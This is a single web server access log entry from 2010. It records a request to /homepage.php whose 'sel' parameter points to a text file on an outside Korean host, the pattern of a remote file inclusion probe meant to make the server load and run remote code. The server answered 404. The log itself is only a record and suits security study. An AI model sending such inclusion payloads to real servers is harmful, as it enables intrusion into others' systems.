125.141.196.78 - - [15/Feb/2010:02:15:15 -0800] "GET /homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
